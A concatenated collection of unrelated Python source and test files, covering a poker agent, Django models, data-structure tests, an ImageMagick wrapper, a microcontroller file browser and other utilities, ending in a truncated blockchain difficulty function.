def __init__(self, strategy_file_path):
super().__init__()
self.strategy = read_strategy_from_file(None, strategy_file_path)
def on_game_start(self, game):
pass
def on_next_turn(self, game, match_state, is_acting_player):
if not is_acting_player:
return
info_set = get_info_set(game, match_state)
node_strategy = self.strategy[info_set]
selected_action = select_action(node_strategy)
self.set_next_action(selected_action)
def on_game_finished(self, game, match_state):
pass
if __name__ == "__main__":
if len(sys.argv) < 5:
print("Usage {game_file_path} {strategy_file_path} {dealer_hostname} {dealer_port}")
sys.exit(1)
client = acpc.Client(sys.argv[1], sys.argv[3], sys.argv[4])
client.play(StrategyAgent(sys.argv[2]))
|
143668
|
from django.db import models
from django.utils.timezone import now
from django.utils.translation import ugettext_lazy as _
from admin_sso import settings
class OpenIDUser(models.Model):
claimed_id = models.TextField(max_length=2047)
email = models.EmailField()
fullname = models.CharField(max_length=255)
user = models.ForeignKey(settings.AUTH_USER_MODEL)
last_login = models.DateTimeField(_('last login'), default=now)
class Meta:
verbose_name = _('OpenIDUser')
verbose_name_plural = _('OpenIDUsers')
app_label = 'admin_sso'
def __unicode__(self):
return self.claimed_id
def update_last_login(self):
self.last_login = now()
self.save()
class Nonce(models.Model):
server_url = models.CharField(max_length=2047)
timestamp = models.IntegerField()
salt = models.CharField(max_length=40)
class Meta:
app_label = 'admin_sso'
class Association(models.Model):
server_url = models.CharField(max_length=2047)
handle = models.CharField(max_length=255)
secret = models.CharField(max_length=255)
issued = models.IntegerField()
lifetime = models.IntegerField()
assoc_type = models.CharField(max_length=64)
class Meta:
app_label = 'admin_sso'
|
143807
|
from ramda import *
from ramda.private.asserts import *
def to_pairs_test():
assert_equal(to_pairs({"a": 1, "b": 2, "c": 3}), [["a", 1], ["b", 2], ["c", 3]])
|
143860
|
class Publisher:
def __init__(self):
self.observers = []
def add(self, observer):
if observer not in self.observers:
self.observers.append(observer)
else:
print('Failed to add: {}'.format(observer))
def remove(self, observer):
try:
self.observers.remove(observer)
except ValueError:
print('Failed to remove: {}'.format(observer))
def notify(self):
[o.notify(self) for o in self.observers]
class DefaultFormatter(Publisher):
def __init__(self, name):
Publisher.__init__(self)
self.name = name
self._data = 0
def __str__(self):
return "{}: '{}' has data = {}".format(type(self).__name__, self.name, self._data)
@property
def data(self):
return self._data
@data.setter
def data(self, new_value):
try:
self._data = int(new_value)
except ValueError as e:
print('Error: {}'.format(e))
self.notify()
class HexFormatter:
def notify(self, publisher):
print("{}: '{}' has now hex data = {}".format(type(self).__name__, publisher.name, hex(publisher.data)))
class BinaryFormatter:
def notify(self, publisher):
print("{}: '{}' has now bin data = {}".format(type(self).__name__, publisher.name, bin(publisher.data)))
def main():
df = DefaultFormatter('test1')
print(df)
print()
hf = HexFormatter()
df.add(hf)
df.data = 3
print(df)
print()
bf = BinaryFormatter()
df.add(bf)
df.data = 21
print(df)
print()
df.remove(hf)
df.data = 40
print(df)
print()
df.remove(hf)
df.add(bf)
df.data = 'hello'
print(df)
print()
df.data = 15.8
print(df)
if __name__ == '__main__':
main()
|
143863
|
from __future__ import division
import fa
import sys
import os
from fa import chunker
if __name__ == "__main__":
from sys import stderr
import argparse
parser = argparse.ArgumentParser(description=(
"Create a set of synthetic genomes consisting "
"of subgroups per tax level. Some kmers are unique, "
"some are shared, and this provides a case where we can test"
" the efficacy and behavior of our bitmap method."))
parser.add_argument("-n", "--num-nucleotides-per-leaf",
type=int, default=13000)
parser.add_argument("-N", "--num-nucs-shared-per-subgroup",
type=int, default=2000)
parser.add_argument("-l", "--num-nucs-shared-per-level",
type=int, default=8000)
parser.add_argument("-d", "--tree-depth",
type=int, default=4)
parser.add_argument("-s", "--split-size", type=int,
default=3,
help=("Number of subgroups for "
"each parent node."))
parser.add_argument("--parent-map", "-p",
help="Path to which to write synthetic taxonomy.",
default="nodes.dmp")
parser.add_argument("-S", "--subgroup-size", type=int,
default=3,
help="Number of genomes for each subgroup")
parser.add_argument("-o", "--outdir", default=".", type=str)
parser.add_argument("--name-id-map", "-m", default="synth_nameidmap.txt")
args = parser.parse_args()
# Variables/settings for constructing synthetic genome
# and accessory files.
mult_per_layer = args.split_size * args.subgroup_size
depth = args.tree_depth
nleaves = mult_per_layer ** (depth - 1)
leaf_seqs = [fa.SeqId(fa.gen_seq(args.num_nucleotides_per_leaf), i) for
i in range(nleaves)]
nleaf_seq = len(leaf_seqs)
outdir = args.outdir
if not os.path.isdir(outdir):
if os.path.isfile(outdir):
raise Exception("Path set for outdir ('%s') is a"
" file... Nah, dawg." % outdir)
os.mkdir(outdir)
outdir = outdir + '/' # Append slash
name_id_map = outdir + args.name_id_map
parent_map = outdir + args.parent_map
# Variables for constructing the parent_map dictionary.
pcmap = {}
used_seqids = set(i.taxid() for i in leaf_seqs)
ctax = max(used_seqids) + 1
last_layer = []
for i in range(1, depth):
nchunks = nleaf_seq // (mult_per_layer ** i)
chunk_size = nleaf_seq // nchunks
assert nleaf_seq % chunk_size == 0
for seqsetid, seqset in enumerate(chunker(leaf_seqs, chunk_size)):
print("seqset len: %i" % len(seqset), file=stderr)
add = fa.gen_seq(args.num_nucs_shared_per_level)
for seq in seqset:
seq.seq += add
seq.subsets[i] = seqsetid
for sssid, seqsubset in enumerate(chunker(seqset,
args.subgroup_size)):
# print("seqsubset len: %i" % len(seqsubset), file=stderr)
add = fa.gen_seq(args.num_nucs_shared_per_subgroup)
for seq in seqset:
seq.seq += add
seq.subgroups[i] = seqsetid
if i == 1: # or it not last_layer
# Add leaf node to parent connections
for seq in seqset:
pcmap[seq.taxid()] = ctax + seqsetid
if i > 1:
# Add higher nodes to parent connections
if i == depth - 1:
pcmap.update((el, 1) for el in last_layer)
break
# This leaves the loop on the last layer in the tree
# because the root is 1 by construction
else:
# pcmap.update((tax, i + ctax) for tax in
# last_layer[i:i+mult_per_layer] for
# i in range(mult_per_layer))
for i in range(mult_per_layer):
for tax in last_layer[i:i + mult_per_layer]:
pcmap[tax] = i + ctax
last_layer = [ctax + i for i in range(nchunks)]
used_seqids.update(last_layer)
ctax = max(used_seqids) + 1
del used_seqids
del ctax
del last_layer
{seq.write(outdir + seq.filename()) for seq in leaf_seqs}
print("[1/3] Successfully created synthetic genomes.", file=stderr)
filenames = [outdir + seq.filename() for seq in leaf_seqs]
fa.write_nameid_map(name_id_map, filenames)
print("[2/3] Successfully wrote nameidmap to %s." % name_id_map,
file=stderr)
fa.write_parent_map(parent_map, pcmap)
print("[3/3] Successfully wrote child->parent map.", file=stderr)
stderr.write("Genomes: %s\n" % ', '.join(filenames))
stderr.write("Nameidmap: %s\n" % name_id_map)
stderr.write("Taxonomy: %s\n" % parent_map)
|
143877
|
import os, sys
CHOICES = 'ignore', 'fail', 'warn', 'warn_once'
DEFAULT = 'warn_once'
ACTION = None
HELP = """
Specify what to do when a project uses deprecated features:
ignore: do nothing
warn: print warning messages for each feature
warn_once: print a warning message, but only once for each type of feature
fail: throw an exception
"""
DEPRECATED = set()
FLAG = '--deprecated'
V4_FLAG = '--v4'
ENVIRONMENT_VARIABLE = 'BP_DEPRECATED'
V4_HELP = """\
Run BiblioPixel in v4 compatibility mode, to see if it will work with
future releases v4.x
"""
def add_arguments(parser):
parser.add_argument(V4_FLAG, action='store_true', help=V4_HELP)
def allowed():
_compute_action()
return ACTION != 'fail'
def deprecated(msg, *args, **kwds):
_compute_action()
if ACTION == 'ignore':
return
if ACTION == 'warn_once' and msg in DEPRECATED:
return
formatted = msg.format(*args, **kwds)
if ACTION == 'fail':
raise ValueError(formatted)
DEPRECATED.add(msg)
from . import log
log.warning(formatted)
def _compute_action():
global ACTION
if ACTION:
return
if FLAG in sys.argv:
raise ValueError('%s needs an argument (one of %s)' %
(FLAG, ', '.join(CHOICES)))
if V4_FLAG in sys.argv:
ACTION = 'fail'
d = [i for i, v in enumerate(sys.argv) if v.startswith(FLAG + '=')]
if len(d) > 1:
raise ValueError('Only one %s argument can be used' % FLAG)
if not d:
ACTION = os.getenv(ENVIRONMENT_VARIABLE, ACTION or DEFAULT)
else:
arg = sys.argv.pop(d[0])
_, *rest = arg.split('=')
if len(rest) > 1:
raise ValueError('Extra = in flag %s' % arg)
if not (rest and rest[0].strip()):
raise ValueError('%s needs an argument (one of %s)' %
(FLAG, ', '.join(CHOICES)))
ACTION = rest[0]
if ACTION not in CHOICES:
ACTION = None
raise ValueError('Unknown deprecation value (must be one of %s)' %
', '.join(CHOICES))
|
143881
|
from nepc import nepc
from nepc.util import util
import pandas as pd
import os
import pytest
import platform
# TODO: remove dependence on csv; put function in scraper that uses built-in
# readlines function
import csv
# TODO: test that all values in [nepc]/tests/data are in the nepc database
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_states_table_has_species_metadata(data_config, nepc_connect):
"""
check that the states table has a species_id column
"""
NEPC_DATA = data_config[0]
number_of_states = util.wc_fxn(NEPC_DATA + 'states.tsv') - 1
df_states = nepc.table_as_df(nepc_connect[1], 'states')
assert len(df_states) == number_of_states
assert 'species_id' in list(df_states.columns)
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_csdata_lines(data_config, nepc_connect):
DIR_NAMES = data_config[1]
cs_lines = 0
for directoryname in DIR_NAMES:
directory = os.fsencode(directoryname)
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".met") or filename.endswith(".mod"):
continue
else:
# subtract 1 to account for header
cs_lines += util.wc_fxn(directoryname + filename) - 1
assert cs_lines == nepc.count_table_rows(nepc_connect[1], "csdata")
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_data_entered(data_config, nepc_connect, local):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
dat_file = row['filename']
df = pd.read_csv(NEPC_DATA + dat_file + '.dat', delimiter='\t',
usecols=['e_energy', 'sigma'])
e_energy, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
# assert e_energy == pytest.approx(df['e_energy'].tolist())
assert sigma == pytest.approx(df['sigma'].tolist())
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_meta_entered(data_config, nepc_connect, local, dbug):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
met_file = row['filename']
if dbug:
print(cs_id, met_file)
e, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
meta_cols = ['cs_id', 'process', 'units_e',
'units_sigma', 'ref', 'lhsA',
'lhsB', 'rhsA', 'rhsB', 'threshold', 'wavelength',
'lhs_v', 'rhs_v', 'lhs_j', 'rhs_j',
'background', 'lpu', 'upu']
with open(NEPC_DATA + met_file + ".met", 'r', newline='') as f:
reader = csv.reader(f, delimiter='\t')
next(reader)
meta_disk = list(reader)[0]
meta_disk = [meta_disk[i] for i in list(range(len(meta_cols)))]
for i in [0, 11, 12, 13, 14]:
meta_disk[i] = (int(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
for i in [2, 3, 9, 10, 16, 17]:
meta_disk[i] = (float(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
meta_db = [nepc.cs_metadata(nepc_connect[1], cs_id)[i]
for i in list(range(0, len(meta_cols)))]
if dbug:
print('meta_db: {}\t from {}'.format(meta_db, met_file))
for i in range(len(meta_cols)):
if dbug:
print('meta_db[{}]: {}\t from {}'.format(str(i), str(meta_db[i]), met_file))
if (type(meta_db[i]) is float):
assert (pytest.approx(meta_disk[i]) ==
pytest.approx(meta_db[i]))
elif meta_db[i] is None:
assert meta_disk[i] == '\\N'
else:
assert meta_disk[i] == meta_db[i]
|
143883
|
import subprocess
import math
import os
from pipes import quote
import platform
class Sorolla:
"""
Main class which will launch ImageMagick commands to apply selected
transformations to the given images.
It needs ImageMagick & GhostScript installed in the system and in PATH
to work properly
"""
@staticmethod
def scale_resource(source_file, dest_file, scale):
"""
Scales a resource; detects if it's a nine-patch via filename in order
to scale it properly
Arguments:
source_file Source file to convert. Path can be relative or
absolute
dest_file Destination file where the converted file will be
saved. Path can be relative or absolute
scale Scale value as a float. If it's greater than zero, the
function upscales the image; if less than zero,
it downscales the image
Returns:
Whether the action could be run or not
"""
if not Sorolla._check_needed_commands:
return False
# Default base density in dpi, set by Imagemagick
base_pdf_density_dpi = 72
try:
command = ""
if ".9." not in source_file:
# Not a resource identified as nine-patch
density = int(scale * base_pdf_density_dpi)
# Scales a vector resource to the desired density
command = 'convert -background transparent -density {0} {1} {2}'
command = command.format(
density,
Sorolla._shellquote(source_file),
Sorolla._shellquote(dest_file),
)
else:
# Resource defined as nine-patch
# Attributes used in Imagemagick command
imagemagick_scale = scale * 100
border_size = math.ceil(scale)
# The following ImageMagick command works as follows (each step
# generates a temporary image)
#
# 0. Tell convert the image that we're going to use, and that
# we want a transparent background
# 1. Create a copy of (0) with our base density (72 DPI)
# 2. Remove 9-patch border from (1) and replace it with
# color
# 3. Mix (1) & (2) so that 9-patch borders are extracted from
# the transparent original image
# 4. Resize (3) to 'imagemagick_scale'. We get scaled 9-patch
# borders, but there will be semi-transparent pixels
# 5. Apply a threshold in (4)'s alpha channel so we can make
# semi-transparent pixels fully opaque
# 6-7. Same process as in 2-3 to extract a bigger 9-patch
# border
# 8-12. Process to adjust the 9-patch border in (7) so we don't
# leave extra space between the border & the image
# 13. Create a raster of the original image (0), keeping
# original quality if PDF or SVG
# 14. Remove 9-patch border of (13) depending on the scale used
# 15. Merge (14) with (12) so we finally have the result
# 9-patch for the given dpi scale
# 16. Delete all generated files in each step
#
# There might be some pixel data loss in ldpi & hdpi
# resolutions as they use float scales to resize the source
# files
#
# In order to debug the process, copy the command to your
# console, remove the 'delete' parenthesis block and add
# '-append' before the destination file. This'll generate a
# .png with all the image steps described by the commands
command = 'convert {0} -background transparent '\
'\( +clone -density {1} \) '\
'\( +clone -shave 1x1 -bordercolor transparent -border 1x1 \) '\
'\( -clone 1 +clone -compose ChangeMask -composite -compose Over \) '\
'\( +clone -resize {2}%% \) '\
'\( +clone -channel A -threshold 50%% +channel \) '\
'\( +clone -shave 1x1 -bordercolor transparent -border 1x1 \) ' \
'\( -clone 5 +clone -compose ChangeMask -composite -compose Over \) '\
'\( -clone 7 -repage +{3}+0 -background none -flatten \) '\
'\( -clone 7 -repage +0+{3} -background none -flatten \) '\
'\( -clone 7 -repage -{3}+0 -background none -flatten \) '\
'\( -clone 7 -repage +0-{3} -background none -flatten \) '\
'\( -clone 8 -clone 9 -compose Over -composite -clone 10 -composite -clone 11 -composite -shave {3}x{3} \) '\
'\( -clone 0 -scale {2}% \) '\
'\( +clone -shave {4}x{4} -bordercolor transparent -border 1x1 \) '\
'\( +clone -clone 12 -composite \) '\
'\( -delete 0-14 \) '\
'{5}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
base_pdf_density_dpi,
imagemagick_scale,
border_size - 1,
border_size,
Sorolla._shellquote(os.path.abspath(dest_file))
)
return Sorolla._run_command(command)
except Exception as e:
print e.errno, e.strerror
return False
@staticmethod
def color_resource(source_file, dest_file, fill_color):
"""
Colors a raster resource; detects if it's a nine-patch via filename in
order to scale it properly
Arguments:
source_file Source file to color. Path can be relative or
absolute
dest_file Destination file where the colored file will be
saved. Path can be relative or absolute
fill_color Color to fill the resource. Must be a RRGGBB string.
Returns:
Whether the action could be run or not
"""
if not Sorolla._check_needed_commands:
return False
try:
command = ""
if ".9." not in source_file:
# Not a resource identified as nine-patch
command = 'convert -background transparent {0} +level-colors "#{1}", '\
'{2}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
fill_color,
Sorolla._shellquote(os.path.abspath(dest_file)),
)
else:
# nine-patch
command = 'convert -background transparent {0} '\
'\( +clone -shave 1x1 -bordercolor transparent -border 1x1 +level-colors "#{1}", \) '\
'\( -clone 0 +clone -composite \) '\
'\( -delete 0-1 \) '\
'{2}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
fill_color,
Sorolla._shellquote(os.path.abspath(dest_file))
)
return Sorolla._run_command(command)
except Exception as e:
print e.value
return False
@staticmethod
def tint_resource(source_file, dest_file, tint_color):
"""
Tints a gray-scaled raster resource; detects if it's a nine-patch via
filename in order to tint it properly
Arguments:
source_file Source file to tint. Path can be relative or
absolute
dest_file Destination file where the tinted file will be
saved. Path can be relative or absolute
fill_color Color to tint the resource. Must be a RRGGBB string.
Returns:
Whether the action could be run or not
"""
if not Sorolla._check_needed_commands:
return False
try:
command = ""
if ".9." not in source_file:
# Not a resource identified as nine-patch
# Check http://www.imagemagick.org/Usage/color_mods/#tint_overlay
command = 'convert -background transparent {0} '\
'\( +clone +matte -fill "#{1}" -colorize 100%% +clone +swap -compose overlay -composite \) '\
'-compose SrcIn -composite {2}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
tint_color,
Sorolla._shellquote(os.path.abspath(dest_file))
)
else:
# nine-patch
command = 'convert -background transparent {0} '\
'\( +clone -shave 1x1 -bordercolor transparent -border 1x1 \) '\
'\( +clone +matte -fill "#{1}" -colorize 100%% \) '\
'\( -clone 0 +clone -compose overlay -composite \) '\
'\( -clone 0 +clone -compose SrcIn -composite \) '\
'\( -delete 0-3 \) {2}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
tint_color,
Sorolla._shellquote(os.path.abspath(dest_file))
)
return Sorolla._run_command(command)
except Exception as e:
print e.value
return False
@staticmethod
def _run_command(command):
"""
Runs a given ImageMagick command
"""
# Windows check; remove escape sequences from parentheses so cmd can
# properly launch the command
if Sorolla._is_windows():
command = command.replace('\\(', '(').replace('\\)', ')')
return subprocess.call(command, shell=True) == 0
@staticmethod
def _shellquote(s):
"""
Util method to escape data in order to use it in shell commands
"""
# return "'" + s.replace("'", "'\\''") + "'"
# Windows check
if not Sorolla._is_windows():
return quote(s)
else:
return '"{0}"'.format(s)
@staticmethod
def _check_command(command, args=[]):
"""
Checks if a command can be executed in the file-system
"""
devnull = open(os.devnull, 'w')
try:
status = subprocess.call(
[command] + args, stdout=devnull, stderr=devnull)
return status == 0
except Exception as e:
print e
return False
@staticmethod
def _check_needed_commands():
"""
Check needed commands: ImageMagick's convert & GhostScript
"""
# Imagemagick check
if not Sorolla._check_command("convert"):
print "Imagemagick is not installed"
return False
# Ghostscript check
if not Sorolla._check_command("gs", ["-version"]):
print "GhostScript is not installed"
return False
return True
@staticmethod
def _is_windows():
"""
Check if the current platform is Windows
"""
return platform.uname()[0].find("Win") != -1
|
143889
|
import os
import lcd
from Maix import GPIO
from board import board_info
from fpioa_manager import fm
# import uos
S_IFDIR = 0o040000 # directory
# noinspection PyPep8Naming
def S_IFMT(mode):
"""Return the portion of the file's mode that describes the
file type.
"""
return mode & 0o170000
# noinspection PyPep8Naming
def S_ISDIR(mode):
"""Return True if mode is from a directory."""
return S_IFMT(mode) == S_IFDIR
def sizeof_fmt(num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
class ExplorerApp:
def __init__(self):
self.current_offset = 0
self.current_selected_index = 0
self.__initialized = False
self.is_dirty = True;
def __lazy_init(self):
self.current_dir_files = os.listdir("/sd/")
print(self.current_dir_files)
self.__initialized = True
def on_top_button_changed(self, state):
if state == "pressed":
print("pressed")
self.current_selected_index += 1
if self.current_selected_index >= len(self.current_dir_files):
self.current_selected_index = 0
if self.current_selected_index >= 7:
self.current_offset = self.current_selected_index - 6
else:
self.current_offset = 0
print("current_selected=", self.current_selected_index,
"current_offset=", self.current_offset)
self.is_dirty = True
def on_draw(self):
self.is_dirty = False
if not self.__initialized:
self.__lazy_init()
x_offset = 4
y_offset = 6
lcd.clear()
for i in range(self.current_offset, len(self.current_dir_files)):
# gc.collect()
file_name = self.current_dir_files[i]
print(file_name)
try:
f_stat = os.stat('/sd/' + file_name)
if S_ISDIR(f_stat[0]):
file_name = file_name + '/'
# gc.collect()
file_readable_size = sizeof_fmt(f_stat[6])
lcd.draw_string(lcd.width() - 50, y_offset,
file_readable_size, lcd.WHITE, lcd.BLUE)
except Exception as e:
print("-------------------->", e)
is_current = self.current_selected_index == i
line = "%s %d %s" % ("->" if is_current else " ", i, file_name)
lcd.draw_string(x_offset, y_offset, line, lcd.WHITE, lcd.RED)
# gc.collect()
y_offset += 18
if y_offset > lcd.height():
print(y_offset, lcd.height(), "y_offset > height(), break")
break
lcd.init()
lcd.rotation(2) # Rotate the lcd 180deg
def test_irq(gpio, pin_num=None):
value = gpio.value()
state = "released" if value else "pressed"
print("key", gpio, state)
global app, key1, key2
if gpio is key2:
app.on_top_button_changed(state)
fm.register(board_info.BUTTON_A, fm.fpioa.GPIOHS21)
fm.register(board_info.BUTTON_B, fm.fpioa.GPIOHS22)
# fm.register(board_info.BUTTON_A, fm.fpioa.GPIOHS21, force=True)
key1=GPIO(GPIO.GPIOHS21, GPIO.IN, GPIO.PULL_UP)
key2=GPIO(GPIO.GPIOHS22, GPIO.IN, GPIO.PULL_UP)
key1.irq(test_irq, GPIO.IRQ_BOTH, GPIO.WAKEUP_NOT_SUPPORT, 7)
key2.irq(test_irq, GPIO.IRQ_BOTH, GPIO.WAKEUP_NOT_SUPPORT, 7)
app = ExplorerApp()
while True:
if app.is_dirty:
app.on_draw()
time.sleep_ms(1)
else:
time.sleep_ms(100)
|
143901
|
import argparse
import os
import shutil
from datetime import datetime
from glob import glob
import gym
import sinergym
envs_id = [env_spec.id for env_spec in gym.envs.registry.all()
if env_spec.id.startswith('Eplus')]
parser = argparse.ArgumentParser()
parser.add_argument('--environments', '-envs', default=envs_id, nargs='+')
parser.add_argument('--episodes', '-ep', type=int, default=1)
args = parser.parse_args()
results = {}
for env_id in args.environments:
env = gym.make(env_id)
# BEGIN EXECUTION TIME
begin_time = datetime.now()
done = False
env.reset()
for _ in range(args.episodes):
while not done:
a = env.action_space.sample()
obs, reward, done, info = env.step(a)
end_time = datetime.now()
env.close()
# END EXECUTION TIME
execution_time = end_time - begin_time
results[env_id] = execution_time.total_seconds()
# Rename directory with name TEST for future remove
os.rename(env.simulator._env_working_dir_parent, 'Eplus-env-TEST' +
env.simulator._env_working_dir_parent.split('/')[-1])
print('====================================================')
print('TIMES RECORDED IN ENVIRONMENTS WITH ', args.episodes, ' EPISODE(S):')
print('====================================================')
for key, value in results.items():
print('{:<50}: {} SECONDS'.format(key, str(value)))
# Deleting all temporal directories generated during tests
directories = glob('Eplus-env-TEST*/')
for directory in directories:
shutil.rmtree(directory)
# Deleting new random weather files once it has been checked
files = glob('sinergym/data/weather/*Random*.epw')
for file in files:
os.remove(file)
|
143909
|
import os
import markdown
from markdown.extensions import Extension
from mako.lookup import TemplateLookup
from mfr.core import extension
class EscapeHtml(Extension):
def extendMarkdown(self, md, md_globals):
del md.preprocessors['html_block']
del md.inlinePatterns['html']
class MdRenderer(extension.BaseRenderer):
TEMPLATE = TemplateLookup(
directories=[
os.path.join(os.path.dirname(__file__), 'templates')
]).get_template('viewer.mako')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.metrics.add('markdown_version', markdown.version)
def render(self):
"""Render a markdown file to html."""
with open(self.file_path, 'r') as fp:
body = markdown.markdown(fp.read(), extensions=[EscapeHtml()])
return self.TEMPLATE.render(base=self.assets_url, body=body)
@property
def file_required(self):
return True
@property
def cache_result(self):
return True
|
143910
|
import array
import pytest
from pdsa.frequency.count_sketch import CountSketch
def test_init():
cs = CountSketch(2, 4)
assert cs.sizeof() == 32, 'Unexpected size in bytes'
with pytest.raises(ValueError) as excinfo:
cs = CountSketch(0, 5)
assert str(excinfo.value) == 'At least one counter array is required'
with pytest.raises(ValueError) as excinfo:
cs = CountSketch(5, 0)
assert str(excinfo.value) == (
'The length of the counter array cannot be less then 1'
)
def test_size():
cs = CountSketch(2, 4)
element_size = array.array('i', [1]).itemsize
assert cs.sizeof() == element_size * len(cs), "Unexpected size in bytes"
def test_create_from_expected_error():
cs = CountSketch.create_from_expected_error(0.0001, 0.01)
assert repr(cs) == "<CountSketch (5 x 271828209)>"
assert len(cs) == 1359141045, 'Unexpected length'
assert cs.sizeof() == 5436564180, 'Unexpected size in bytes'
with pytest.raises(ValueError) as excinfo:
cs = CountSketch.create_from_expected_error(0.001, 2)
assert str(excinfo.value) == 'Error rate shell be in (0, 1)'
with pytest.raises(ValueError) as excinfo:
cs = CountSketch.create_from_expected_error(0.0000000001, 0.02)
assert str(excinfo.value) == 'Deviation is too small. Not enough counters'
def test_repr():
cs = CountSketch(2, 4)
assert repr(cs) == "<CountSketch (2 x 4)>"
cs = CountSketch.create_from_expected_error(0.1, 0.01)
assert repr(cs) == "<CountSketch (5 x 272)>"
def test_add():
cs = CountSketch(4, 100)
for word in ["test", 1, {"hello": "world"}]:
cs.add(word)
assert cs.frequency(word) == 1, "Can't find frequency for element"
def test_frequency():
cs = CountSketch(4, 100)
cs.add("test")
assert cs.frequency("test") == 1, "Can't find recently added element"
assert cs.frequency("test_test") == 0, "False positive detected"
def test_len():
cs = CountSketch(2, 4)
assert len(cs) == 8
|
143913
|
from .batch import AsyncBatchEnv, BatchEnv, SyncBatchEnv
from .wrappers import Atari, ChannelFirst, Monitor
__all__ = [
"BatchEnv",
"SyncBatchEnv",
"AsyncBatchEnv",
"ChannelFirst",
"Atari",
"Monitor",
]
|
143982
|
import unittest
from os.path import join
from robot import api, model, parsing, reporting, result, running
from robot.api import parsing as api_parsing
from robot.utils.asserts import assert_equal, assert_true
class TestExposedApi(unittest.TestCase):
def test_execution_result(self):
assert_equal(api.ExecutionResult, result.ExecutionResult)
def test_test_suite(self):
assert_equal(api.TestSuite, running.TestSuite)
def test_result_writer(self):
assert_equal(api.ResultWriter, reporting.ResultWriter)
def test_visitors(self):
assert_equal(api.SuiteVisitor, model.SuiteVisitor)
assert_equal(api.ResultVisitor, result.ResultVisitor)
def test_deprecated_parsing(self):
assert_equal(api.get_model, parsing.get_model)
assert_equal(api.get_resource_model, parsing.get_resource_model)
assert_equal(api.get_tokens, parsing.get_tokens)
assert_equal(api.get_resource_tokens, parsing.get_resource_tokens)
assert_equal(api.Token, parsing.Token)
def test_parsing_getters(self):
assert_equal(api_parsing.get_model, parsing.get_model)
assert_equal(api_parsing.get_resource_model, parsing.get_resource_model)
assert_equal(api_parsing.get_tokens, parsing.get_tokens)
assert_equal(api_parsing.get_resource_tokens, parsing.get_resource_tokens)
def test_parsing_token(self):
assert_equal(api_parsing.Token, parsing.Token)
def test_parsing_model_statements(self):
for cls in parsing.model.Statement._statement_handlers.values():
assert_equal(getattr(api_parsing, cls.__name__), cls)
assert_true(not hasattr(api_parsing, 'Statement'))
def test_parsing_model_blocks(self):
for name in ('File', 'SettingSection', 'VariableSection', 'TestCaseSection',
'KeywordSection', 'CommentSection', 'TestCase', 'Keyword', 'For',
'If'):
assert_equal(getattr(api_parsing, name), getattr(parsing.model, name))
assert_true(not hasattr(api_parsing, 'Block'))
def test_parsing_visitors(self):
assert_equal(api_parsing.ModelVisitor, parsing.ModelVisitor)
assert_equal(api_parsing.ModelTransformer, parsing.ModelTransformer)
class TestModelObjects(unittest.TestCase):
"""These model objects are part of the public API.
They are only seldom needed directly and thus not exposed via the robot.api
package. Tests just validate they are not removed accidentally.
"""
def test_running_objects(self):
assert_true(running.TestSuite)
assert_true(running.TestCase)
assert_true(running.Keyword)
def test_result_objects(self):
assert_true(result.TestSuite)
assert_true(result.TestCase)
assert_true(result.Keyword)
class TestTestSuiteBuilder(unittest.TestCase):
# This list has paths like `/path/file.py/../file.robot` on purpose.
# They don't work unless normalized.
sources = [join(__file__, '../../../atest/testdata/misc', name)
for name in ('pass_and_fail.robot', 'normal.robot')]
def test_create_with_datasources_as_list(self):
suite = api.TestSuiteBuilder().build(*self.sources)
assert_equal(suite.name, 'Pass And Fail & Normal')
def test_create_with_datasource_as_string(self):
suite = api.TestSuiteBuilder().build(self.sources[0])
assert_equal(suite.name, 'Pass And Fail')
if __name__ == '__main__':
unittest.main()
|
143997
|
from uwallet.blockchain import unet
from uwallet.blockchain import ArithUint256
GENESIS_BITS = 0x1f07ffff
MAX_TARGET = 0x0007FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
N_TARGET_TIMESPAN = 150
def check_bits(bits):
bitsN = (bits >> 24) & 0xff
assert 0x03 <= bitsN <= 0x1f, \
"First part of bits should be in [0x03, 0x1d], but it was {}".format(hex(bitsN))
bitsBase = bits & 0xffffff
assert 0x8000 <= bitsBase <= 0x7fffff, \
"Second part of bits should be in [0x8000, 0x7fffff] but it was {}".format(bitsBase)
def get_target(index, first, last, chain='main'):
"""
this follows the calculations in lbrycrd/src/lbry.cpp
Returns: (bits, target)
"""
if index == 0:
return GENESIS_BITS, MAX_TARGET
assert last is not None, "Last shouldn't be none"
# bits to target
bits = last.get('bits')
# print_error("Last bits: ", bits)
self.check_bits(bits)
# new target
nActualTimespan = last.get('timestamp') - first.get('timestamp')
nTargetTimespan = N_TARGET_TIMESPAN #150
nModulatedTimespan = nTargetTimespan - (nActualTimespan - nTargetTimespan) / 8
nMinTimespan = nTargetTimespan - (nTargetTimespan / 8)
nMaxTimespan = nTargetTimespan + (nTargetTimespan / 2)
if nModulatedTimespan < nMinTimespan:
